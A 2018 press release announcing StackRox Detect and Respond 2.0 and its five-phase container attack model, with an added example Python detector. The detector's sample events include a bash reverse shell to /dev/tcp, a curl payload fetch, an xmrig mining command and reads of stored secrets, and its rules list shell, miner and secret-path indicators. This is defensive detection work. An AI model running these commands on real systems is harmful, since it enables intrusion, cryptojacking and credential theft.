StackRox Delivers Adversarial Intent Model (AIM)

February 2, 2018

StackRox Detect and Respond 2.0 delivers threat detection across the five phases of a container attack defined by the new StackRox AIM. With expanded depth and breadth of threat detection, auto-tuned machine learning, and automatic application grouping, StackRox Detect and Respond 2.0 helps customers get ahead of threats aimed at Docker containers running in production with less manual effort.

“Container usage for production deployments in enterprises is still constrained by concerns around security, monitoring, data management, networking and orchestration,” wrote Arun Chandrasekaran and Dennis Smith, Gartner research VPs in Best Practices for Running Containers in Production.* StackRox Detect and Respond deploys using a customer’s existing tools and orchestrator, running alongside containerized applications to continuously monitor and protect containers from threats.

StackRox’s research and development with Docker, Google, and large enterprises in the area of container runtime security has culminated in StackRox AIM, a five-phase threat model that underlies the company’s detection strategy for surfacing attacks. By examining application deployments through an attacker’s lens, StackRox exposes threats by fusing together signals from container environments that correspond to the five iterative phases of an attack’s lifecycle. The new detection capabilities within each of these categories include:

  • Foothold. Reverse shell invocation enabled by generic initial exploitation vectors (e.g. web- or network-based exploits); Java-based code injection attacks.
  • Privilege Escalation. Execution of setuid/setgid by non-root users.
  • Persistence. Database persistence via posting of database procedures; user persistence via modification of PAM configuration.
  • Lateral Movement. Anomalous network communication with a client followed by payload execution or unexpected process cloning.
  • Objectives. Cryptocurrency mining software; exfiltration of sensitive content via reading stored secrets or accessing confidential file paths.
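As an added example of how signals from the five phases above can be mapped to attack stages (illustrative Python written for this page, not StackRox’s product code or detection logic), the sketch below runs a handful of rules over constructed container runtime events. The event schema, the indicator lists (shell names, miner binaries, secret and PAM paths), the 5-second correlation window for lateral movement, and the sample events are all assumptions made for the example; the one stateful rule shows why "fusing" matters, since an anomalous connection on its own is only a signal and becomes a finding only when a process execution follows it.

```python
"""Map container runtime events to the five AIM phases named in the article.

Added example, not StackRox code. The Event schema, indicator lists,
window size and sample events are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Event:
    ts: float                   # seconds since epoch (constructed)
    kind: str                   # "exec" | "file_write" | "file_read" | "net"
    container: str
    user: str = "root"
    comm: str = ""              # process name for exec events
    parent: str = ""            # parent process name for exec events
    args: Tuple[str, ...] = ()
    setuid: bool = False        # exec'd binary carried a setuid/setgid bit
    path: str = ""              # file path for file events
    remote: str = ""            # peer address for net events


SHELLS = {"sh", "bash", "dash", "zsh"}
WEB_PARENTS = {"java", "nginx", "httpd", "node"}   # assumed hosts of the initial exploit
MINERS = {"xmrig", "minerd", "cpuminer"}            # assumed miner binary names
SECRET_PREFIXES = ("/run/secrets/", "/var/run/secrets/")
PAM_PATHS = ("/etc/pam.d/", "/etc/pam.conf")
LATERAL_WINDOW = 5.0   # seconds between an anomalous connection and a follow-on exec


class AimDetector:
    """Stateless rules for four phases; lateral movement fuses two events."""

    def __init__(self, expected_peers: Dict[str, Set[str]]):
        self.expected_peers = expected_peers            # container -> allowed peers
        self._last_anomalous_net: Dict[str, float] = {}  # container -> timestamp

    def classify(self, e: Event) -> Optional[str]:
        if e.kind == "exec":
            if e.comm in SHELLS and any("/dev/tcp/" in a for a in e.args):
                return "Foothold: reverse shell invocation"
            if e.comm in SHELLS and e.parent in WEB_PARENTS:
                return "Foothold: shell spawned by %s (code injection)" % e.parent
            if e.setuid and e.user != "root":
                return "Privilege Escalation: setuid/setgid binary run by %s" % e.user
            if e.comm in MINERS or any(a.startswith("stratum+tcp://") for a in e.args):
                return "Objectives: cryptocurrency mining software"
            if e.comm in {"psql", "mysql"} and any("CREATE PROCEDURE" in a.upper() for a in e.args):
                return "Persistence: database procedure created"
            last = self._last_anomalous_net.get(e.container)
            if last is not None and 0 <= e.ts - last <= LATERAL_WINDOW:
                return "Lateral Movement: payload executed after anomalous connection"
        elif e.kind == "file_write" and e.path.startswith(PAM_PATHS):
            return "Persistence: PAM configuration modified"
        elif e.kind == "file_read" and e.path.startswith(SECRET_PREFIXES):
            return "Objectives: stored secret read (%s)" % e.path
        elif e.kind == "net" and e.remote not in self.expected_peers.get(e.container, set()):
            # A lone unexpected connection is remembered as a signal, not reported.
            self._last_anomalous_net[e.container] = e.ts
        return None

    def run(self, events: List[Event]) -> List[Tuple[str, str]]:
        findings = []
        for e in sorted(events, key=lambda x: x.ts):   # order matters for correlation
            tag = self.classify(e)
            if tag is not None:
                findings.append((e.container, tag))
        return findings


# Constructed sample: one web container compromised end to end, one miner elsewhere.
SAMPLE_EVENTS = [
    Event(1.0, "exec", "web-1", user="app", comm="bash", parent="java", args=("bash", "-c", "id")),
    Event(2.0, "exec", "web-1", user="app", comm="bash",
          args=("bash", "-i", ">&", "/dev/tcp/203.0.113.9/4444", "0>&1")),
    Event(3.0, "exec", "web-1", user="app", comm="su", setuid=True, args=("su", "-")),
    Event(4.0, "file_write", "web-1", path="/etc/pam.d/common-auth"),
    Event(5.0, "net", "web-1", remote="10.0.7.22:6379"),      # not an expected peer
    Event(6.5, "exec", "web-1", comm="curl", args=("curl", "http://10.0.7.22/x.sh")),
    Event(7.0, "exec", "db-1", user="postgres", comm="xmrig",
          args=("xmrig", "-o", "stratum+tcp://pool.example:3333")),
    Event(8.0, "file_read", "web-1", path="/run/secrets/db_password"),
    Event(9.0, "net", "web-1", remote="10.0.1.5:5432"),       # expected peer, no signal
]


def detect_sample() -> List[Tuple[str, str]]:
    return AimDetector({"web-1": {"10.0.1.5:5432"}}).run(SAMPLE_EVENTS)


if __name__ == "__main__":
    for container, tag in detect_sample():
        print(container, tag)
```

Real runtime sensors would supply richer context (cgroup and image identity, file descriptor types, socket peers) than the flat schema used here, and the expected-peer table would come from the learned baseline rather than a hard-coded dictionary, but the phase-to-rule structure is the part worth carrying over.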

“We’ve worked closely with our enterprise customers to help protect them against the new landscape of threats in container environments. Together we developed StackRox AIM as a new methodology to protect them from threats,” said Sameer Bhalotra, co-founder and CEO for StackRox. “With the new capabilities in StackRox Detect and Respond 2.0, enterprises running containers in production can get ahead of attackers and limit the blast radius of attacks.”

StackRox Detect and Respond 2.0 now includes:

  • Expanded threat detection. New capabilities as described above to increase the depth and breadth of threat detection based on StackRox AIM.
  • Autotuned machine learning. StackRox now automates learning from security events, establishing baselines so it can provide alerts for anomalous activities as potential Indicators of Compromise (IOCs).
  • Extended integration with container orchestrators. StackRox leverages user-defined data from the orchestrator to automatically group services within applications, eliminating manual work for users, and providing immediate visibility into applications.

StackRox Detect and Respond 2.0 is scheduled for general availability in Q1 2018.
